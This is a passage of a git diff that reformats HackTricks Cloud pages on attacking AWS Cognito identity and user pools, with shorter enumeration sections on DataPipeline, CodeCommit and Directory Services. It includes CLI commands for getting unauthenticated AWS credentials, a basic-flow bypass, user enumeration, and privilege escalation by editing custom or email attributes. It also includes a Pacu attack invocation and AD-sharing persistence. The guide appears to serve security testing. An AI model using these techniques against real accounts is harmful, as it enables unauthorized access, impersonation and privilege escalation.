Installation @@ -100,9 +87,8 @@ For more information check https://github.com/padok-team/cognito-scanner The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable). -{% hint style="success" %} -The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` -{% endhint %} +> [!TIP] +> The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with: @@ -139,9 +125,8 @@ aws cognito-identity get-id --identity-pool-id --no-sign aws cognito-identity get-credentials-for-identity --identity-id --no-sign ``` -{% hint style="warning" %} -Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. -{% endhint %} +> [!WARNING] +> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. ### Enhanced vs Basic Authentication flow @@ -149,7 +134,6 @@ The previous section followed the **default enhanced authentication flow**. This However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**. -{% code overflow="wrap" %} ```bash # Get auth ID aws cognito-identity get-id --identity-pool-id --no-sign @@ -161,29 +145,25 @@ aws cognito-identity get-open-id-token --identity-id --no-sign ## If you don't know the role_arn use the previous enhanced flow to get it aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token --no-sign ``` -{% endcode %} -{% hint style="warning" %} -If you receive this **error**, it's because the **basic flow is not enabled (default)** +> [!WARNING] +> If you receive this **error**, it's because the **basic flow is not enabled (default)** -`An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` -{% endhint %} +> `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/). ### Authenticated -{% hint style="info" %} -Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. -{% endhint %} +> [!NOTE] +> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. There could also be **roles** available for **authenticated users accessing the Identity Poo**l. For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**. -{% hint style="success" %} -The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` -{% endhint %} +> [!TIP] +> The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured). @@ -205,21 +185,7 @@ aws cognito-identity get-credentials-for-identity \ --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN> -{% hint style="warning" %} -It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. -{% endhint %} +> [!WARNING] +> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md similarity index 70% rename from pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md rename to src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md index d0229cf86..471d04789 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md @@ -1,19 +1,6 @@ # Cognito User Pools -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information @@ -21,24 +8,24 @@ A user pool is a user directory in Amazon Cognito. With a user pool, your users User pools provide: -* Sign-up and sign-in services. -* A built-in, customizable web UI to sign in users. -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -* User directory management and user profiles. -* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -* Customized workflows and user migration through AWS Lambda triggers. +- Sign-up and sign-in services. +- A built-in, customizable web UI to sign in users. +- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. +- User directory management and user profiles. +- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. +- Customized workflows and user migration through AWS Lambda triggers. **Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool. ### Potential attacks -* **Registration**: By default a user can register himself, so he could create a user for himself. -* **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. -* **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. +- **Registration**: By default a user can register himself, so he could create a user for himself. +- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. +- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. ### Tools for pentesting -* [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. ```bash @@ -46,12 +33,12 @@ User pools provide: Pacu (new:test) > run cognito__enum # cognito__attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. ```bash # Install @@ -60,10 +47,10 @@ pip install cognito-scanner cognito-scanner --help ``` -* [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. +- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. ```bash -python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl +python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl ``` ## Registration @@ -96,10 +83,9 @@ You could use this functionality also to **enumerate existing users.** This is t An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists ``` -{% hint style="info" %} -Note in the previous command how the **custom attributes start with "custom:"**.\ -Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. -{% endhint %} +> [!NOTE] +> Note in the previous command how the **custom attributes start with "custom:"**.\ +> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. Or just to test if a client id exists. This is the error if the client-id doesn't exist: @@ -125,9 +111,8 @@ aws cognito-idp confirm-sign-up --client-id \ --no-sign-request --region us-east-1 ``` -{% hint style="warning" %} -Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. -{% endhint %} +> [!WARNING] +> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. ### Privilege Escalation / Updating Attributes @@ -142,20 +127,18 @@ aws cognito-idp update-user-attributes \ #### Custom attribute privesc -{% hint style="danger" %} -You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! -{% endhint %} +> [!CAUTION] +> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! #### Email/username modification privesc You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again). -{% hint style="warning" %} -You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ -Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. +> [!WARNING] +> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ +> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. -Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. -{% endhint %} +> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**: @@ -168,9 +151,8 @@ aws cognito-idp verify-user-attribute \ Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**. -{% hint style="info" %} -The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred\_username already being used** to impersonate a different user. -{% endhint %} +> [!NOTE] +> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user. ### Recover/Change Password @@ -182,9 +164,8 @@ aws cognito-idp forgot-password \ --username --region ``` -{% hint style="info" %} -The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users -{% endhint %} +> [!NOTE] +> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users With the code you can change the password with: @@ -210,32 +191,31 @@ aws cognito-idp change-password \ A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\ Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**. -* [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. - * The ID Token is the token that **contains the attributes values of the user**, even the custom ones. -* [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. -* [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. +- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. + - The ID Token is the token that **contains the attributes values of the user**, even the custom ones. +- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. +- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. -### ADMIN\_NO\_SRP\_AUTH & ADMIN\_USER\_PASSWORD\_AUTH +### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH This is the server side authentication flow: -* The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. -* After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. +- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. +- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. This **method is NOT enabled** by default. To **login** you **need** to know: -* user pool id -* client id -* username -* password -* client secret (only if the app is configured to use a secret) +- user pool id +- client id +- username +- password +- client secret (only if the app is configured to use a secret) -{% hint style="info" %} -In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ -Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** -{% endhint %} +> [!NOTE] +> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ +> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** ```python aws cognito-idp admin-initiate-auth \ @@ -295,29 +275,28 @@ print(login_user(username, password, client_id, client_secret, user_pool_id)) -### USER\_PASSWORD\_AUTH +### USER_PASSWORD_AUTH -This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW\_USER\_SRP\_AUTH** method instead (as that one never sends the password over the network).\ +This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\ This **method is NOT enabled** by default. The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool. To **login** you **need** to know: -* client id -* username -* password -* client secret (only if the app is configured to use a secret) +- client id +- username +- password +- client secret (only if the app is configured to use a secret) -{% hint style="info" %} -In order to be **able to login with this method** that application must allow to login with ALLOW\_USER\_PASSWORD\_AUTH. -{% endhint %} +> [!NOTE] +> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH. ```python aws cognito-idp initiate-auth --client-id \ --auth-flow USER_PASSWORD_AUTH --region \ --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' - + # Check the python code to learn how to generate the secret_hash ``` @@ -367,18 +346,18 @@ print(login_user(username, password, client_id, client_secret, user_pool_id)) -### USER\_SRP\_AUTH +### USER_SRP_AUTH This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\ This **method is enabled** by default. To **login** you **need** to know: -* user pool id -* client id -* username -* password -* client secret (only if the app is configured to use a secret) +- user pool id +- client id +- username +- password +- client secret (only if the app is configured to use a secret)
@@ -395,7 +374,7 @@ CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx' CLIENT_SECRET = 'secreeeeet' os.environ["AWS_DEFAULT_REGION"] = "" -aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, +aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, client_id=CLIENT_ID, client_secret=CLIENT_SECRET) tokens = aws.authenticate_user() id_token = tokens['AuthenticationResult']['IdToken'] @@ -406,7 +385,7 @@ token_type = tokens['AuthenticationResult']['TokenType']
-### REFRESH\_TOKEN\_AUTH & REFRESH\_TOKEN +### REFRESH_TOKEN_AUTH & REFRESH_TOKEN This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token. @@ -452,7 +431,7 @@ print(refresh(client_id, token)) -### CUSTOM\_AUTH +### CUSTOM_AUTH In this case the **authentication** is going to be performed through the **execution of a lambda function**. @@ -475,20 +454,17 @@ Note that even if a group is inside a group with an IAM role attached, in order Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.** -
+
The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\ However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed): -{% code overflow="wrap" %} ``` An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN. ``` -{% endcode %} -{% hint style="warning" %} -Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). -{% endhint %} +> [!WARNING] +> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). ```json { @@ -513,17 +489,4 @@ Note that the role assigned to a **User Pool Group** needs to be **accesible by }js ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md similarity index 57% rename from pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md rename to src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index bc391a196..e660baf74 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -1,19 +1,6 @@ # AWS - DataPipeline, CodePipeline & CodeCommit Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## DataPipeline @@ -22,10 +9,10 @@ AWS Data Pipeline is designed to facilitate the **access, transformation, and ef 1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. 2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. 3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: - * Amazon S3 - * Amazon RDS - * Amazon DynamoDB - * Amazon EMR + - Amazon S3 + - Amazon RDS + - Amazon DynamoDB + - Amazon EMR In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. @@ -42,9 +29,9 @@ aws datapipeline get-pipeline-definition --pipeline-id In the following page you can check how to **abuse datapipeline permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-datapipeline-privesc.md" %} -[aws-datapipeline-privesc.md](../aws-privilege-escalation/aws-datapipeline-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-datapipeline-privesc.md +{{#endref}} ## CodePipeline @@ -65,9 +52,9 @@ aws codepipeline get-pipeline-state --name In the following page you can check how to **abuse codepipeline permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-codepipeline-privesc.md" %} -[aws-codepipeline-privesc.md](../aws-privilege-escalation/aws-codepipeline-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-codepipeline-privesc.md +{{#endref}} ## CodeCommit @@ -111,19 +98,6 @@ git clone ssh://@git-codecommit..amazonaws.com/v1/repos/[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md index e659755c5..d3c99529b 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md @@ -1,19 +1,6 @@ # AWS - Directory Services / WorkDocs Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Directory Services @@ -23,17 +10,17 @@ AWS Directory Service for Microsoft Active Directory is a managed service that m Directory Services allows to create 5 types of directories: -* **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. -* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. -* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. -* **Amazon Cognito User Pools**: This is the same as Cognito User Pools. -* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. +- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. +- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. +- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. +- **Amazon Cognito User Pools**: This is the same as Cognito User Pools. +- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**. ### Lab -Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms\_ad\_tutorial\_test\_lab\_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) +Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) ### Enumeration @@ -54,17 +41,17 @@ aws ds describe-certificate --directory-id --certificate-id Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:** -* `.awsapps.com/connect` (Amazon Connect) -* `.awsapps.com/workdocs` (Amazon WorkDocs) -* `.awsapps.com/workmail` (Amazon WorkMail) -* `.awsapps.com/console` (Amazon Management Console) -* `.awsapps.com/start` (IAM Identity Center) +- `.awsapps.com/connect` (Amazon Connect) +- `.awsapps.com/workdocs` (Amazon WorkDocs) +- `.awsapps.com/workmail` (Amazon WorkMail) +- `.awsapps.com/console` (Amazon Management Console) +- `.awsapps.com/start` (IAM Identity Center) ### Privilege Escalation -{% content-ref url="../aws-privilege-escalation/aws-directory-services-privesc.md" %} -[aws-directory-services-privesc.md](../aws-privilege-escalation/aws-directory-services-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-directory-services-privesc.md +{{#endref}} ## Persistence @@ -80,7 +67,7 @@ It's also possible to **add a user to a group inside AD** and **give that AD gro It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\ However, this implies sharing the managed AD and also creating an VPC peering connection. -You can find a guide here: 